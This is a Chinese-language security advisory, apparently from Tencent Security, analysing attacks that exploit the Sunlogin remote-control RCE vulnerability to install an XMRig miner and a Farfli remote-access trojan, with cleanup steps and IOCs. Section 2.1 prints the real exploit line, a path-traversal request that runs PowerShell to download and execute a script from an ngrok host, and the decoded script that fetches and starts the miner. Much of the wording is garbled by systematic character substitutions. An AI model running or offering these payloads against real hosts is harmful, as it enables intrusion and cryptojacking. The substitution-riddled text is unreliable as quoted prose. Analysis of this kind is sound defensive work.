共计 2878 个字符,预计需要花费 8 分钟才能阅读完成。
一、概述
近日,腾讯平安威逼情报中心检测到有挖矿、远控黑产团伙利用向日葵远控软件 RCE 破绽攻打企业主机和个人电脑,已有局部未修复破绽的主机、个人电脑受益。攻击者利用破绽入侵后可间接取得零碎控制权,受益主机已被用于门罗币挖矿。
在局部城市因疫情治理须要,近程办公场景增多,向日葵类近程控制软件的利用也会减少,从而零碎被黑客利用破绽入侵管制的危险也随之减少。腾讯平安专家建议政企机构与个人电脑用户将向日葵远控软件降级到最新版本以修复破绽,倡议防止将不必要的端口及服务在公网凋谢,防止将集体远控软件装置在业务服务器中。举荐应用腾讯零信赖 iOA、或腾讯电脑管家进行病毒扫描,排查零碎是否已被入侵,采纳零信赖 iOA 解决近程平安接入需要,防止疫情期间零碎被黑客管制而造成损失。
向日葵是一款收费的,集近程管制电脑、手机、远程桌面连贯、近程开机、远程管理、反对内网穿透等性能的一体化近程管制管理软件。往年 2 月,向日葵个人版 V11.0.0.33 之前的版本与简洁版 V1.0.1.43315(2021.12)之前的版本被披露存在近程代码执行(RCE)破绽,破绽编号 CNVD-2022-10270,CNVD-2022-03672。
存在破绽的系统启动服务端软件后,会凋谢未受权拜访端口,攻击者可通过未受权拜访无需明码间接获取 session,并借此近程执行任意代码。从而导致存在破绽的个人电脑或服务器被黑客入侵管制。
在上述高危破绽呈现后,腾讯平安旗下的主机平安产品、零信赖 iOA、破绽扫描服务、高危威逼检测零碎均已反对对向日葵 RCE 破绽的检测和进攻。
腾讯零信赖 iOA 拦挡利用向日葵 RCE 破绽的攻打
本次利用向日葵近程代码执行破绽攻打流传的挖矿木马为 XMRig(门罗币)挖矿程序,企业或个人用户可参考以下内容自查后清理:
1. 查看工作管理器,完结高 CPU/GPU 占用的程序;
2. 查看 c:\users\public\ 目录下是否存在木马文件 xmrig.exe、WinRing0x64.sys、config.json,如果有,就删除这些文件。
远控木马应用 Farfli 家族开源代码编译而成,自查与清理形式:
1. 查看 Svchost 下的服务名,清理服务 NETRUDSL
通过运行 msconfig,或 regedit 查看以下相干零碎服务是否存在:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
2. 删除远控木马文件
C:\Windows\33649531.dll(在不同主机上 33649531 为随机 8 位数字)
腾讯平安系列产品已反对检测、查杀利用向日葵近程代码执行破绽攻打流传的 XMRig 类挖矿木马与 Farfli 家族远控木马,具体响应清单如下:
更多产品信息,请参考腾讯平安官方网站 https://s.tencent.com/
二、详细分析
2.1 挖矿木马
利用破绽投递并执行歹意脚本:
ping../../../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe -exec bypass -noexit -C IEX (new-object system.net.webclient).downloadstring(/”http://pingce.jp.ngrok.io/ob.ps1/”)
脚本内容解码后如下:
$url = “http://pingce.jp.ngrok.io/xmrig.exe”
$url2 = “http://pingce.jp.ngrok.io/config.json”
$url3 = “http://pingce.jp.ngrok.io/WinRing0x64.sys”
$output = “C:\users\public\xmrig.exe”
$output2 = “C:\users\public\config.json”
$output3 = “C:\users\public\WinRing0x64.sys”
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $output)
$wc.DownloadFile($url2, $output2)
$wc.DownloadFile($url3, $output3)
taskkill /f /t /im xmrig.exe
Remove-Item -Path “C:\Users\public\c3pool” -Recurse
Start-Sleep -s 15
start-process “c:\users\public\xmrig.exe” -ArgumentList “-c c:\users\public\config.json”
开释零碎挖矿过程,启动指定配置的 XMRig 挖矿程序。
2.2 远控木马
木马外壳分区段装载远控木马,tProtectVirtualMemory 批改内存属性为可读可执行。
最终开释出的可执行文件为 Farfli 家族开源代码编译而成的远控木马。
该木马对外提供的功能模块
三、威逼处理手册
1. 清理木马
云主机用户可应用腾讯主机平安的快扫性能,清理查杀利用向日葵远控 RCE 破绽攻打流传的后门木马:通过腾讯主机平安(云镜)控制台,入侵检测 -> 文件查杀,检测全网资产,检测歹意文件,若发现,可进行一键隔离操作。
步骤如下:
A: 主机平安 (云镜) 控制台:入侵检测 -> 文件查杀,抉择一键检测:
B:弹出一键检测设置,抉择疾速扫描,全副专业版主机后开启扫描:
C:查看扫描出的木马危险后果项
D:对检出的木马文件进行一键隔离(留神勾选隔离同时完结木马过程选项)
- 修复破绽
云主机可应用腾讯主机平安(云镜)的破绽检测修复性能,帮助用户疾速修补相干高危破绽,用户可登录腾讯主机平安控制台,顺次关上左侧“破绽治理”,对扫描到的零碎组件破绽、web 利用破绽、利用破绽进行排查。
步骤细节如下:
A:主机平安(云镜)控制台:关上破绽治理 -> 破绽危险检测,点击一键检测,进行资产破绽扫描
B:查看扫描到的向日葵近程代码执行破绽危险我的项目详情
C:依据检测后果,对检测到有危险的资产进行破绽修复(登录相应主机,降级向日葵远控工具软件到最新版本)。
D:回到主机平安(云镜)控制台再次关上“破绽治理”,从新检测确保资产已不受破绽影响。
3. 进攻
腾讯云防火墙已反对检测进攻利用向日葵近程代码执行破绽的攻打,私有云客户能够开明腾讯云防火墙高级版进行无效进攻:
在腾讯云控制台界面,关上入侵进攻设置即可。
IOCs
【挖矿木马】
Domain
pingce[.]jp[.]ngrok[.]io
md5
0c0195c48b6b8582fa6f6373032118da
e6d26c76401c990bc94f4131350cde3e
【远控】
C2
s1[.]yk[.]hyi8mc[.]top
md5
3f5da20aff1364faa177e90ac325cbd0
dd4786854b9e61fa1637d69a3eb71f93